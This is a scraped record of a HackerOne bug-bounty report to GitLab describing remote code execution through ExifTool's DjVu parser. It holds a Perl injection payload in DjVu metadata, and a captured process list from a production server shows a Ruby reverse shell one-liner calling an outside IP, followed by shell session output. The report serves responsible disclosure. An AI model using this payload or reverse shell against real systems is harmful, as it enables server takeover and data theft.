/usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T10:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T10:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T10:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQV5YSYWEH%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T102945Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHoaCXVzLXdlc3QtMiJHMEUCIQDTAAr%2B6U9OJnd6dAvT5G4m1QtfKZ4ZH8uUfklPi2%2BalwIgJIWIv74iEb16qBb13IInDtQnYb5RLdDIxZknaSbFQyYq%2BgMIExACGgwwMTM2MTkyNzQ4NDkiDOh8YFRmnP9GS%2FOLQCrXA6raLXkaOQSi9bCvrTXf1CG7smUJsCK5P9Pxr2xGdN93%2Bv6eoz3fJf1y6sJCfXN6XcFIECBOGVycZQAgyi7MIL01V1DGy4BNWTIrWW5MYdiDlmOVyDzuU%2BhfEXcQ7kbPWaVyz71KNHUjsyrR9RHZWdFCSqXX0ON%2FkrZtQ8peyBOLrM9E7jhOxHUXRfBwfb9rrLRPktmVtotyCuZLR%2FJD7v3GQZa%2Bg0rnze3sDZLp4LzYAHW7YAB0q9rGSH6lVH7ZQ6kQBN6UsZDq2UFPTlEXGI9ONf64ma2hGMGMH7rq1Kn4Es1y8rUKiVwESBiWy1c1nwIsPh8DlSx%2BJaXYGCHSPHngmh6AO3XKX%2Bi%2BjihPxU0FY%2BxDRW1eYkGnEr%2BHUXRYEhPRco43n3joEB0iPfEg4C1xLD81mF1gjukwDiQzMIBuJNfgQ82LGeWRAdmewk3bpspfXBHap8q3vhk9SAet%2Fvt3aetpuTyGdPCBQt%2FLUUYk856LKu5dfzADgePaen41qgQhzRpkxctx1xlYvWcfC%2FFNdZkPPpqe5AfD%2BJg3%2BMTN46FLgKi4t%2Bvl9FpYcXHS3MRujLXSZifeO%2FL0B6%2BESDQIq3B%2Fiyx0vLCUKXoV0jZNIYKt0UpCjjDFvv6EBjqlAcUCYGgBvJX2vSm8Lz6rCBz%2B%2Bivi0ScuJfGzsxXFZdvSG%2BW7I6KWRgGSAmVMn%2FQYwnUpue30mifiD3H63v1bCJ7cE8C9zG9QARLYu%2BphcQR40aQyu1w8aWsxpA8u4RjVAqOGjaeBZ%2BWRxOHD2VW11vJ252tJ8sYRGyNOqmyqqf7Z2v1kVXtX%2Bo2AuqsTKYN5gMFZcdDQHTI4L4n3rxE0oWdhPUS65Q%3D%3D&X-Amz-Signature=09d604b3e9ce8fe771caacdeddd60cd397e78cc410190627f775e4d1c284db9d"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T10:29:46", "differentElements": ["h1reporter"], "edition": 15}, {"bulletin": {"id": "H1:1154542", "hash": "9b54ce9e1e7c46bbe066b1ee317d9cda", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 